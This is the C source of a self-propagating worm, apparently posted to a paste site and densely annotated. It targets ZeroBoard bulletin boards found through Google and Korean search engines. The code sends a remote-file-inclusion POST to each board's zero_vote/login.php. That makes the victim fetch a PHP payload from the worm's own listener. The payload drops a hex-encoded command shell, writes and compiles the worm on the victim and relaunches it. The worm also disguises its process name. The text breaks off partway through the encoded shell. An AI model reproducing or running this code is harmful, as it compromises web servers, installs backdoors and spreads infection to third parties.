ZeroStar Worm — ZeroBoard vulnerability exploit (self-propagating scanner, payload listener and PHP dropper; C source)

Feb 2nd, 2023
  1. #include <stdio.h>
  2. #include <unistd.h>
  3. #include <stdlib.h>
  4. #include <sys/socket.h>
  5. #include <netdb.h>
  6. #include <netinet/in.h>
  7. #include <signal.h>
  8. #include <sys/ioctl.h>
  9. #include <net/if.h>
  10. #ifdef __sun__
  11. #include <sys/sockio.h>
  12. #endif /* __SunOS__ */
  13.  
/* Compile-time debug switch. It is defined and immediately undefined, so every
 * "#ifdef DEBUG_ING" block in this file (progress messages, response-marker
 * matching) is compiled out in this configuration. */
#define DEBUG_ING
#undef DEBUG_ING

/* Working files, all relative to the current directory of the running binary.
 * They exist only while an instance is active (sf_exit() unlinks them):
 *   TMP_FILE  raw search-engine response the scanner is parsing
 *   CMD_FILE  generated PHP payload served by the listener (see make_cmd_file())
 *   PRC_FILE  PID of the listener child; read back by proc_r() and by the
 *             generated PHP to detect an already-running instance */
#define TMP_FILE "./tmp.core"
#define CMD_FILE "./cmd.core"
#define PRC_FILE "./proc.core"
/* Generic zero/one used as initial values and loop conditions
 * (while(MIN) below is an unconditional loop). */
#define SCS (0)
#define MIN (1)

/* Interface whose IPv4 address g_ip() advertises to victims. Only Linux,
 * FreeBSD and Solaris get a value; on any other platform DEF_ETH stays
 * undefined and g_ip() does not compile. */
#ifdef __linux__
#define DEF_ETH "eth0"
#else
#ifdef __FreeBSD__
#define DEF_ETH "ed0"
#else
#ifdef __sun__
#define DEF_ETH "hme0"
#endif
#endif
#endif

/* Stack buffer sizes used by main()/set_sock(): 65535, 2048, 1024, 512, 256. */
#define MAX_BUF (0x0000ffff)
#define FIR_BUF (0x00000800)
#define SEC_BUF (0x00000400)
#define THR_BUF (0x00000200)
#define MIN_BUF (0x00000100)

/* Host that filter_f() always rejects as a target (presumably the board
 * software vendor's own site). */
#define VENDOR "nzeo.com"

// Search-engine query strings ("dorks") used to locate ZeroBoard installs.
// The -t option selects one; the same index selects the FD_PATH_* below.
#define FD_RULE_0 "/zboard/zboard.php"
#define FD_RULE_1 "/zb41/zboard.php"
#define FD_RULE_2 "/bbs/zboard.php"
#define FD_RULE_3 "/zb/zboard.php"
#define FD_RULE_4 "/zb40/zboard.php"
#define FD_RULE_5 "/board/zboard.php"
#define FD_RULE_6 "zboard.php"
#define FD_RULE_7 "zboard.ph"

// Path appended to a discovered host to reach the targeted vote-skin script.
// FD_PATH_6 is shared by rules 6 and 7 (see __tg_rule_va[]).
#define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
#define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
#define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
#define FD_PATH_3 "/zb/skin/zero_vote/login.php"
#define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
#define FD_PATH_5 "/board/skin/zero_vote/login.php"
#define FD_PATH_6 "/skin/zero_vote/login.php"

/* Markers looked for in a victim's HTTP response. MAKE_*/DELT_* are echoed by
 * the generated PHP (make_cmd_file()); main() only checks them under DEBUG_ING. */
#define RESULT_OK "200 OK"
#define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
#define MAKE_STR2 "ZBCODE MAKE SUCCESS"
#define DELT_STR1 "BACKDOOR DELETE SUCCESS"
#define DELT_STR2 "ZBCODE DELETE SUCCESS"

/* DEF_PORT: default port of the payload listener (overridden with -p; the
 * generated PHP re-launches with a random port > 1024). CONN_PORT: port used
 * for search engines and for victims without an explicit ":port". DEF_TIME:
 * seconds before the SIGALRM handler t_kill() aborts a pending connect. */
#define DEF_PORT (31337)
#define CONN_PORT (80)
#define DEF_TIME (20)

/* Forward declarations; see each definition below. */
int set_sock(char *sc_gt_host,int port,int type);
void re_connt_lm(int st_sock_va,int type);
int proc_r();
void t_kill();
void sf_exit();
int g_ip(char *ip);
int make_cmd_file();
int filter_f(char *test_bf,int tnum);

/* Global client socket; shared with the SIGALRM handler so t_kill() can close it. */
int sock;
  82.  
/* One scanning rule. r_num is the index (same as the position in
 * __tg_rule_va[]); r_str is the query string sent to the search engine and
 * also required to appear in a candidate link; url_str is the path appended
 * to the candidate host for the attack POST. */
struct tg_rl
{
 int r_num;
 char *r_str;
 char *url_str;
};
  89.  
/* Highest index accepted by -t and -s respectively. main() checks only
 * "TARGET_NUM<value" / "SEARCH_NUM<value", so 0..7 and 0..4 pass and a
 * negative or non-numeric value (atoi() result) is not rejected. The generated
 * PHP uses them as rand() moduli, so it only ever picks 0..6 and 0..3. */
#define TARGET_NUM (7)
#define SEARCH_NUM (4)
  92.  
/* Rule table indexed by -t. Entries 0..5 pair a "/dir/zboard.php" query with
 * the zero_vote path under the same dir; entries 6 and 7 use the bare
 * "zboard.php" / "zboard.ph" queries and share FD_PATH_6, which main() appends
 * to whatever path the discovered link already carried. The {8,NULL,NULL}
 * sentinel is not consulted anywhere in the code shown. */
struct tg_rl __tg_rule_va[]=
{
 {0,FD_RULE_0,FD_PATH_0},
 {1,FD_RULE_1,FD_PATH_1},
 {2,FD_RULE_2,FD_PATH_2},
 {3,FD_RULE_3,FD_PATH_3},
 {4,FD_RULE_4,FD_PATH_4},
 {5,FD_RULE_5,FD_PATH_5},
 {6,FD_RULE_6,FD_PATH_6},
 {7,FD_RULE_7,FD_PATH_6},
 {8,NULL,NULL}
};
  105.  
/* One search engine. num is the index (selects the request format in main()
 * and the noise filter in filter_f()); url is the engine host; maxnum is the
 * result offset at which paging stops; defnum is the offset step per page;
 * http_head is the prefix that marks a link in the result HTML ("http://" or
 * a bare "//"). */
struct search_rule
{
 int num;
 u_char *url;
 int maxnum;
 int defnum;
 u_char *http_head;
};
  114.  
/* Search engines indexed by -s: Google, Yahoo Korea, Nate, Lycos and AltaVista
 * Korea. Together with "hl=ko" / "Accept-Language: ko" in main()'s requests
 * this presumably biases the hunt toward Korean-language sites. The NULL
 * sentinel is not consulted anywhere in the code shown. */
struct search_rule search_va[]=
{
 {0,"www.google.com",990,10,"http://"},
 {1,"kr.search.yahoo.com",990,15,"http://"},
 {2,"search.nate.com",480,10,"http://"},
 {3,"search.lycos.com",990,10,"//"},
 {4,"kr.altavista.com",1000,10,"//"},
 {5,NULL,0,0,NULL}
};
  124.  
/* SIGALRM handler armed by set_sock() (client mode) for DEF_TIME seconds.
 * Closes the global client socket, marks it invalid and restores the default
 * disposition, so a lookup or connect() still pending in set_sock() fails once
 * interrupted. close()/signal() are async-signal-safe; the fprintf under
 * DEBUG_ING is not. Nothing in this file disarms the timer with alarm(0) after
 * a successful connect, so it can presumably also fire later during an
 * unrelated recv() on the same global descriptor. */
void t_kill()
{
#ifdef DEBUG_ING
 fprintf(stdout,"time out\n");
#endif
 close(sock);
 sock=-1;
 signal(SIGALRM,SIG_DFL);
 return;
}
  135.  
/* Cleanup-and-exit. Installed as the SIGINT/SIGTSTP handler and also called
 * directly at the end of a scan sweep and on argument errors. Closes the client
 * socket, SIGKILLs the listener child (PID read from PRC_FILE by proc_r()),
 * removes the three working files and exits with -1.
 * Because proc_r() itself exit()s when PRC_FILE is missing, the unlinks are
 * skipped in that case and tmp.core / cmd.core can be left on disk.
 * exit() (unlike _exit()) is not async-signal-safe, so as a signal handler this
 * is technically undefined; kill()/close()/unlink() are safe. */
void sf_exit()
{
#ifdef DEBUG_ING
 fprintf(stdout,"safe exit\n");
#endif
 close(sock);
 kill((int)proc_r(),9);
 unlink(TMP_FILE);
 unlink(CMD_FILE);
 unlink(PRC_FILE);
 exit(-1);
}
  148.  
/*
 * Entry point: option parsing, payload generation, then a fork into two
 * processes.
 *
 * Child ("receive mode process"): ignores SIGALRM, wipes argv, records its PID
 * in PRC_FILE and runs the payload server set_sock(NULL,def_port,1), which only
 * returns on failure; re_connt_lm() then kills both processes.
 *
 * Parent ("scanning mode process"): either attacks the single host/url given
 * with -h/-u (jumps straight to the `ok:` label, so the -u value is used
 * verbatim and port stays CONN_PORT), or performs one sweep: pages through the
 * chosen search engine with the chosen query, extracts every link from each
 * response, keeps the ones that pass filter_f(), and POSTs
 * "dir=http://<own ip>:<def_port>/" to <host><path><url_str> of each one. The
 * listener answers that URL with the PHP in CMD_FILE, so the target's
 * zero_vote/login.php is evidently expected to fetch and execute it via the
 * "dir" parameter (a remote file inclusion; not verified here). The sweep ends
 * in sf_exit(), which kills the listener and deletes the working files.
 *
 * Options (upper or lower case): -s engine index into search_va[], -t rule
 * index into __tg_rule_va[], -q starting result offset, -p listener port,
 * -h host and -u url (both required together; one alone is an error). Only the
 * upper bound of -s/-t is checked; atoi() of a negative or non-numeric value is
 * used as-is and indexes the tables out of range.
 *
 * Both processes zero argv[] and overwrite argv[0] so the command line is
 * disguised in process listings; the strcpy() writes 21 resp. 22 bytes into
 * argv[0] regardless of how long the original argv[0] was.
 *
 * Returns -1 only if TMP_FILE cannot be opened; every other path ends in
 * sf_exit() (or in re_connt_lm() for the child).
 */
int main(int argc,char *argv[])
{
 FILE *fp;

 int tnum=(SCS);            /* -s: search engine index */
 int chk=(SCS);             /* reused: tag-stripping state, then host[] write index */
 int gogo=(SCS);            /* scratch index */
 int whgl=(SCS);            /* getopt result, then scratch index */
 int qnum=(SCS);            /* -q: first result offset */
 int tgrl_sl=(MIN);         /* -t: rule index (default 1) */
 int _conn_num=(SCS);       /* current result offset */
 int port=(CONN_PORT);      /* victim port parsed from the link */
 int def_port=(DEF_PORT);   /* -p: listener port advertised in the payload */
 int sc_gt_sock;
 int host_chk=(SCS);        /* number of -h/-u options seen */

 u_char *gg_ptr=NULL;
 u_char *t_ptr=NULL;
 u_char __zr_bf[(MAX_BUF)]; /* one line of the saved search response */
 u_char *port_ptr=NULL;

 char pkt[(FIR_BUF)];       /* attack request / response */
 char host[(SEC_BUF)];
 char url[(SEC_BUF)];
 char test_bf[(MAX_BUF)];   /* recv chunk, later the cleaned link text */
 char req_t_bf[(THR_BUF)];  /* search-engine request */
 char ip[(MIN_BUF)];        /* own address from g_ip() */
 char atk_code[(MIN_BUF)];  /* POST body */

 /* Ctrl-C / Ctrl-Z trigger cleanup rather than leaving the listener running. */
 signal(SIGINT,sf_exit);
 signal(SIGTSTP,sf_exit);

 while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
 {
  extern char *optarg;
  switch(whgl)
  {
   case 'S':
   case 's':
    tnum=atoi(optarg);
    if(SEARCH_NUM<tnum)
    {
     fprintf(stderr,"target error\n");
     exit(-1);
    }
    break;

   case 'T':
   case 't':
    tgrl_sl=atoi(optarg);
    if(TARGET_NUM<tgrl_sl)
    {
     fprintf(stderr,"target error\n");
     exit(-1);
    }
    break;

   case 'Q':
   case 'q':
    qnum=atoi(optarg);
    break;

   case 'P':
   case 'p':
    def_port=atoi(optarg);
    break;

   case 'H':
   case 'h':
    memset((char *)host,0,sizeof(host));
    strncpy(host,optarg,sizeof(host)-1);
    host_chk++;
    break;

   case 'U':
   case 'u':
    memset((char *)url,0,sizeof(url));
    strncpy(url,optarg,sizeof(url)-1);
    host_chk++;
    break;

   default:
    exit(-1);
  }
 }

 /* Generate CMD_FILE; the return value is ignored, so the listener starts even
  * if the payload could not be (fully) written. */
 (int)make_cmd_file();

 if(fork()==0)
 {
  /* Listener child. SIGALRM is ignored here; set_sock() in server mode does
   * not arm it anyway. */
  signal(SIGALRM,SIG_IGN);
  for(whgl=0;whgl<argc;whgl++)
  {
   memset((char *)argv[whgl],0,strlen(argv[whgl]));
  }
  strcpy(argv[0],"receive mode process");
  /* Publish own PID so sf_exit()/re_connt_lm() and the generated PHP can find
   * this process. */
  if((fp=fopen(PRC_FILE,"w"))==NULL)
  {
   sf_exit();
  }
  fprintf(fp,"%d\n",getpid());
  fclose(fp);
  /* Serves CMD_FILE forever; returns -1 only on a setup/accept failure. */
  sc_gt_sock=(int)set_sock(NULL,def_port,1);
  (void)re_connt_lm(sc_gt_sock,0);
 }
 else
 {
  /* Scanner parent. */
  for(whgl=0;whgl<argc;whgl++)
  {
   memset((char *)argv[whgl],0,strlen(argv[whgl]));
  }
  strcpy(argv[0],"scanning mode process");

  switch(host_chk)
  {
   case 1:
    /* Only one of -h/-u given. */
#ifdef DEBUG_ING
    fprintf(stdout,"argument error\n");
#endif
    sf_exit();
    break;

   case 2:
    /* Single-target mode: skip the search and attack host/url directly.
     * gg_ptr is still NULL on this path, so a failed connect at `ok:` (which
     * does `continue` into the while(MIN) loop) then calls strstr() on NULL. */
    goto ok;
    break;
  }

#ifdef DEBUG_ING
  fprintf(stdout,"search url: %s\n",search_va[tnum].url);
#endif
  /* One page of results per iteration, from offset qnum up to maxnum. */
  for(_conn_num=qnum; _conn_num< search_va[tnum].maxnum; _conn_num += (search_va[tnum].defnum))
  {
   /* Retries the engine connect indefinitely (each try bounded only by the
    * DEF_TIME alarm inside set_sock()). */
conn: if((sock=(int)set_sock(search_va[tnum].url,(CONN_PORT),0))==-1)
   {
    goto conn;
   }

   /* Build the engine-specific HTTP/1.0 GET; the query is the raw rule string
    * (not URL-encoded) and the offset parameter differs per engine. */
   memset((char *)req_t_bf,0,sizeof(req_t_bf));
   switch(search_va[tnum].num)
   {
    case 0:
     snprintf(req_t_bf,sizeof(req_t_bf)-1,
      "GET /search?q=%s"
      "&hl=ko&lr=&ie=UTF-8&start=%d&sa=N "
      "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
     break;
    case 1:
     snprintf(req_t_bf,sizeof(req_t_bf)-1,
      "GET /search/web?p=%s&b=%d "
      "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
     break;
    case 2:
     snprintf(req_t_bf,sizeof(req_t_bf)-1,
      "GET /webpage/search.asp?query=%s&start=%d "
      "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
     break;
    case 3:
     snprintf(req_t_bf,sizeof(req_t_bf)-1,
      "GET /default.asp?query=%s&first=%d&pmore=more "
      "HTTP/1.0\r\n"
      "Accept-Language: ko\r\n"
      "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
      "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
     break;
    case 4:
     snprintf(req_t_bf,sizeof(req_t_bf)-1,
      "GET /web/results?itag=wrx&q=%s&stq=%d "
      "HTTP/1.0\r\n"
      "Accept-Language: ko\r\n"
      "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
      "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
     break;
   }
   send(sock,req_t_bf,strlen(req_t_bf),0);
   whgl=(SCS);

   if((fp=fopen(TMP_FILE,"w"))==NULL)
   {
    return(-1);
   }
   /* Replace the 20 s alarm from set_sock() with a 65535 s one that is ignored
    * anyway: reading the response has effectively no timeout. */
   signal(SIGALRM,SIG_IGN);
   alarm(MAX_BUF);

   /* Spool the whole response to TMP_FILE. Each chunk is written as a C string,
    * so bytes after an embedded NUL are dropped; a recv() error (-1) is truthy
    * and keeps the loop going. */
   memset((char *)test_bf,0,sizeof(test_bf));
   while(recv(sock,test_bf,sizeof(test_bf)-1,0))
   {
    fprintf(fp,"%s",test_bf);
    memset((char *)test_bf,0,sizeof(test_bf));
   }
   fclose(fp);
   close(sock);

   if((fp=fopen(TMP_FILE,"r"))==NULL)
   {
    return(-1);
   }

   /* Re-read the response line by line and pull every link out of it. */
   while(fgets(__zr_bf,sizeof(__zr_bf)-1,fp))
   {
    gg_ptr=__zr_bf;

    while(MIN)
    {
     /* Next occurrence of the link prefix; gg_ptr is advanced past it before
      * the NULL check (pointer arithmetic on NULL when there is none), but is
      * only used again if t_ptr was non-NULL. */
     t_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head);
     gg_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);

     if(t_ptr!=NULL)
     {
      memset((char *)test_bf,0,sizeof(test_bf));
      whgl=(SCS);
      chk=(SCS);

      /* Copy the rest of the line into test_bf, dropping spaces and anything
       * between '<' and '>' (chk==1 while inside a tag). */
      for(gogo=0;gogo<strlen(t_ptr);gogo++)
      {
       if(chk)
       {
        if(t_ptr[gogo]=='>')
         chk=0;
       }
       else {
        if(t_ptr[gogo]==' ')
         continue;
        else if(t_ptr[gogo]=='<')
         chk=1;
        else test_bf[whgl++]=t_ptr[gogo];
       }
      }

      /* The cleaned text must contain the query string; truncate just before it
       * so test_bf is "<prefix><host>[:port][/path]". */
      if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str))
       continue;
      else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str);

      if(t_ptr!=NULL)
       t_ptr[0]='\0';
      else continue;

      if(filter_f(test_bf,tnum))
      {
       /* Reject if a second link prefix follows the first (two links ran
        * together in the cleaned text). */
       t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
       if(strstr(t_ptr,search_va[tnum].http_head))
        continue;

       memset((char *)host,0,sizeof(host));
       memset((char *)url,0,sizeof(url));

       chk=(SCS);

       if(strstr(test_bf,search_va[tnum].http_head))
       {
        t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
        port=(CONN_PORT);

        /* Split into host / port / path. Note the copies into url[] (1024)
         * and host[] (1024) are not bounded, while test_bf holds up to 65534
         * bytes from the search response, and strcat() adds url_str on top. */
        for(whgl=0;whgl<strlen(t_ptr)+1;whgl++)
        {
         if(t_ptr[whgl]=='/')
         {
          /* Path present: keep it and append the zero_vote path. */
          for(gogo=0;whgl<strlen(t_ptr);whgl++)
           url[gogo++]=t_ptr[whgl];
          strcat(url,__tg_rule_va[tgrl_sl].url_str);
          break;
         }
         else if(t_ptr[whgl]=='\0')
         {
          /* Bare host: the zero_vote path alone. */
          strncpy(url,__tg_rule_va[tgrl_sl].url_str,sizeof(url)-1);
          break;
         }
         else if(t_ptr[whgl]==':')
         {
          /* Port parsed from the text after the first ':'. */
          port_ptr=(char *)strstr(t_ptr,":")+1;
          port=atoi(port_ptr);
         }
         else host[chk++]=t_ptr[whgl];
        }
#ifdef DEBUG_ING
        fprintf(stdout,"Total:%s,URL:%s,HOST:%s,PORT:%d\n",test_bf,url,host,port);
#endif
        /* Attack one target. Also the entry point of single-target mode. */
ok:
        sock=set_sock(host,port,0);
        if(sock==-1)
         continue;
        else {
         memset((char *)ip,0,sizeof(ip));
         memset((char *)atk_code,0,sizeof(atk_code));
         memset((char *)pkt,0,sizeof(pkt));

         /* Body is "dir=http://<own ip>:<def_port>/\r\n" (the trailing CRLF is
          * counted in Content-Length); ip stays empty if g_ip() failed.
          * Request line uses the absolute-URI form. */
         (int)g_ip(ip);
         snprintf(atk_code,sizeof(atk_code)-1,"dir=http://%s:%d/\r\n",ip,def_port);
         snprintf(pkt,sizeof(pkt)-1,
          "POST http://%s%s HTTP/1.0\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n"
          "Content-Length: %d\r\n"
          "Host: %s\r\n\r\n%s\r\n",host,url,strlen(atk_code),host,atk_code);
         send(sock,pkt,strlen(pkt),0);
         memset((char *)pkt,0,sizeof(pkt));
         /* One recv() only; the response is inspected only under DEBUG_ING. */
         recv(sock,pkt,sizeof(pkt)-1,0);
#ifdef DEBUG_ING
         if(strstr(pkt,RESULT_OK))
         {
          if(strstr(pkt,MAKE_STR1))
           fprintf(stdout,"%s\n",MAKE_STR1);
          if(strstr(pkt,MAKE_STR2))
           fprintf(stdout,"%s\n",MAKE_STR2);
          if(strstr(pkt,DELT_STR1))
           fprintf(stdout,"%s\n",DELT_STR1);
          if(strstr(pkt,DELT_STR2))
           fprintf(stdout,"%s\n",DELT_STR2);
          printf("%s: %s\n",RESULT_OK,host);
         }
#endif
        }
        close(sock);

        /* Single-target mode stops after the one attack. */
        if(host_chk)
        {
         sf_exit();
        }
       }
      }
     }
     else break;
    }
    memset((char *)__zr_bf,0,sizeof(__zr_bf));
   }
   fclose(fp);
   unlink(TMP_FILE);
  }
  /* Sweep finished: kill the listener, remove the working files, exit. */
  sf_exit();
 }
}
  478.  
/*
 * Dual-purpose socket helper.
 *
 * type==0 (client): installs t_kill() as SIGALRM handler and arms it for
 * DEF_TIME seconds, resolves sc_gt_host with gethostbyname(), connects a TCP
 * socket to port and returns it. The descriptor is also stored in the global
 * `sock` so the handler can close it. Returns -1 on lookup, socket or connect
 * failure. The alarm is not cancelled on success.
 *
 * type==1 (payload server): binds INADDR_ANY:port, listens and loops forever:
 * accept a client, consume bytes one at a time until the first "\r\n\r\n"
 * (end of an HTTP request head; nothing in the request is inspected), reply
 * "HTTP/1.1 200 OK\r\n\r\n", stream CMD_FILE line by line, close the client.
 * Any peer that sends a blank line gets the PHP payload — no authentication,
 * no path check — which makes a live listener easy to fingerprint. Returns -1
 * only when socket/bind/listen/accept or opening CMD_FILE fails; sc_gt_host is
 * unused in this mode. SO_REUSEADDR is not set.
 */
int set_sock(char *sc_gt_host,int port,int type)
{
 struct sockaddr_in sock_st;
 struct sockaddr_in t_st;
 int nw_gt_sock,s_s;
 struct hostent *hst_etr;
 int sc_gt_sock;
 int t_c=0;                 /* receives one byte at a time (into an int) */
 char t_b[(SEC_BUF)];
 FILE *fp;
 char http_rq[]="HTTP/1.1 200 OK\r\n\r\n";

 if(!type){
  /* Client: bounded by the DEF_TIME alarm (see t_kill()). */
  signal(SIGALRM,t_kill);
  alarm(DEF_TIME);

  if((hst_etr=gethostbyname(sc_gt_host))==NULL)
  {
   return(-1);
  }
  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  {
   return(-1);
  }
  sock_st.sin_family=(AF_INET);
  sock_st.sin_port=htons(port);
  sock_st.sin_addr=*((struct in_addr *)hst_etr->h_addr); /* first address only */
  memset(&(sock_st.sin_zero),0,8);

  if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
  {
   close(sock);
   return(-1);
  }
  return(sock);
 }
 else{
  /* Server: listen on all interfaces. */
  if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  {
   return(-1);
  }

  sock_st.sin_family=(AF_INET);
  sock_st.sin_port=htons(port);
  sock_st.sin_addr.s_addr=(INADDR_ANY);
  memset(&(sock_st.sin_zero),0,8);

  if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
  {
   close(sc_gt_sock);
   return(-1);
  }
#define BK_LG 10
  if(listen(sc_gt_sock,(BK_LG))==-1){
   close(sc_gt_sock);
   return(-1);
  }
  while(1){
   s_s=sizeof(struct sockaddr_in);
   if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1)
   {
    close(nw_gt_sock);
    close(sc_gt_sock);
    return(-1);
   }
   /* Skip the request head: stop at the first CR LF CR LF. A recv() error
    * (-1) is truthy here and keeps the loop spinning. */
   while(recv(nw_gt_sock,&t_c,1,0)){
    if(t_c==0x0d){
     recv(nw_gt_sock,&t_c,1,0);
     if(t_c==0x0a){
      recv(nw_gt_sock,&t_c,1,0);
      if(t_c==0x0d){
       recv(nw_gt_sock,&t_c,1,0);
       if(t_c==0x0a){
        break;
       }
      }
     }
    }
   }

   /* Minimal response: status line, blank line, then the payload file, re-read
    * from disk on every connection. */
   send(nw_gt_sock,http_rq,strlen(http_rq),0);
   if((fp=fopen(CMD_FILE,"r"))==NULL){
    close(nw_gt_sock);
    close(sc_gt_sock);
    return(-1);
   }
   memset((char *)t_b,0,sizeof(t_b));
   while(fgets(t_b,sizeof(t_b)-1,fp)){
    send(nw_gt_sock,t_b,strlen(t_b),0);
   }
   fclose(fp);
   close(nw_gt_sock);
   continue;
  }
  /* Unreachable: the loop above never breaks. */
  close(sc_gt_sock);
  return(-1);
 }
}
  577.  
/* Called by the listener child after set_sock(...,1) returns, which only
 * happens on failure (st_sock_va==-1). With type 0 (the only value used in
 * this file) it SIGKILLs the parent scanner, then SIGKILLs the PID stored in
 * PRC_FILE — the calling child itself — so sf_exit() is normally never
 * reached. Does nothing when st_sock_va is a valid descriptor. */
void re_connt_lm(int st_sock_va,int type)
{
 if(st_sock_va==-1)
 {
  if(!type){
   kill(getppid(),9); // parent (scanner)
  }
  kill((int)proc_r(),9); // child (listener, i.e. this process)
  sf_exit();
 }
}
  589.  
/* Reads the listener PID from PRC_FILE (written by the child in main()).
 * Terminates the whole process with exit(-1) if the file cannot be opened,
 * which is why callers (sf_exit(), re_connt_lm()) never get a chance to clean
 * up in that case. The fscanf() result is not checked, so an empty or
 * malformed file returns an uninitialised proc_n. */
int proc_r(){
 FILE *fp;
 int proc_n;
 if((fp=fopen(PRC_FILE,"r"))==NULL){
  exit(-1); // no listener PID on disk: treat as fatal
 }
 fscanf(fp,"%16d",&proc_n);
 fclose(fp);
 return proc_n;
}
  600.  
/* Fills ip (a MIN_BUF-byte buffer) with the dotted-quad IPv4 address of
 * DEF_ETH, obtained with SIOCGIFADDR on a throw-away TCP socket. Returns -1
 * only if the socket cannot be created; returns 0 otherwise, including when
 * the ioctl fails, in which case ip is left untouched (main() pre-zeroes it,
 * so the advertised URL then has an empty host). The socket is never closed,
 * so each call leaks one descriptor. The memcpy copies sizeof(ifr_name)
 * (IFNAMSIZ, 16 on Linux) bytes out of a 5-character literal, i.e. reads past
 * its end. inet_ntoa() is used without including <arpa/inet.h>. */
int g_ip(char *ip)
{
 int sock;
 struct ifreq ifpq;
 struct sockaddr_in *pq;

 memset(&ifpq,0,sizeof(ifpq));
 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
 {
  return(-1);
 }
 pq=(struct sockaddr_in *)&ifpq.ifr_addr;
 pq->sin_family=AF_INET;

 memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name));
 if(ioctl(sock,SIOCGIFADDR,&ifpq)==0)
 {
  memset((char *)ip,0,(MIN_BUF));
  snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr));
 }
 return 0;
}
  623.  
/* Files the generated PHP drops on a victim (host-based indicators), relative
 * to the directory it chdir()s into: the PHP shell, the worm binary (also the
 * name this binary must have in its own cwd so make_cmd_file() can read it)
 * and the worm source that is recompiled on the victim. */
#define BACKDOOR_PATH "zblog.php"
#define CODE_PATH "zbcode"
#define CODE_PATH_SRC "zbcode.c"
  627.  
/*
 * Writes the PHP payload served by the listener into CMD_FILE. When a victim
 * fetches it through the injected "dir=" URL it runs as the web-server user
 * and, in order:
 *   1. chdir('../../') — two levels up from where it is included (presumably
 *      the board root, given the skin/zero_vote/ paths targeted);
 *   2. if PRC_FILE exists and /proc/<that pid>/stat is readable, exit: an
 *      instance is already running on this host (re-infection guard);
 *   3. writes BACKDOOR_PATH ("zblog.php") from the hex string below, which
 *      decodes to a small PHP shell: an HTML form with a hidden "cmd" field
 *      that strips backslashes from $command and echoes the output of
 *      `$command` (appears to rely on register_globals for $command);
 *   4. embeds, byte by byte as "\xNN", the running binary CODE_PATH ("zbcode",
 *      read from the current directory) and its source CODE_PATH_SRC
 *      ("zbcode.c"), writes both to disk, runs `gcc -o zbcode zbcode.c` on
 *      the victim and chmod 0755s the result;
 *   5. echoes MAKE_STR1/MAKE_STR2 (seen by the scanner only under DEBUG_ING);
 *   6. (#if 1 branch) loops forever: re-checks the guard, picks a random
 *      listener port > 1024 and exec()s "./zbcode -t <0..6> -p <port>
 *      -s <0..3> -q <offset>". The #else branch is a disabled uninstall
 *      variant that deletes zblog.php/zbcode and echoes DELT_STR1/DELT_STR2.
 *
 * Returns -1 if CMD_FILE cannot be created or zbcode / zbcode.c cannot be
 * read; in the latter two cases fp is left open, so whatever was buffered is
 * written only when stdio flushes at exit. Declared int but has no return on
 * the success path. main() ignores the result either way.
 *
 * Artifacts on a victim: zblog.php, zbcode, zbcode.c, and tmp.core /
 * cmd.core / proc.core while zbcode is running.
 */
int make_cmd_file()
{
 unsigned long w1=0;        /* one byte is read into this; see fread() below */
 FILE *fp;
 FILE *pf;

 if((fp=fopen(CMD_FILE,"w"))==NULL)
 {
  return(-1);
 }

 /* Guard + PHP shell dropper. %s placeholders are PRC_FILE and BACKDOOR_PATH. */
 fprintf(fp,"<?\n"
  "chdir('../../');\n\n"
  "if(($fp=fopen('%s','r'))!=NULL)\n"
  "{\n"
  "$pnum=fread($fp,32);\n"
  "fclose($fp);\n"
  "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
  "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
  "{\n"
  "exit;\n"
  "}\n"
  "}\n\n"
  "$cont=\"\\x3c\\x3f\\x0a\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x46\".\n"
  "\"\\x4f\\x52\\x4d\\x20\\x41\\x43\\x54\\x49\\x4f\\x4e\\x3d\\x24\".\n"
  "\"\\x50\\x48\\x50\\x5f\\x53\\x45\\x4c\\x46\\x20\\x4d\\x45\\x54\".\n"
  "\"\\x48\\x4f\\x44\\x3d\\x50\\x4f\\x53\\x54\\x3e\\x27\\x3b\\x0a\".\n"
  "\"\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x49\\x4e\\x50\\x55\".\n"
  "\"\\x54\\x20\\x54\\x59\\x50\\x45\\x3d\\x48\\x49\\x44\\x44\\x45\".\n"
  "\"\\x4e\\x20\\x4e\\x41\\x4d\\x45\\x3d\\x63\\x6d\\x64\\x20\\x56\".\n"
  "\"\\x41\\x4c\\x55\\x45\\x3d\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
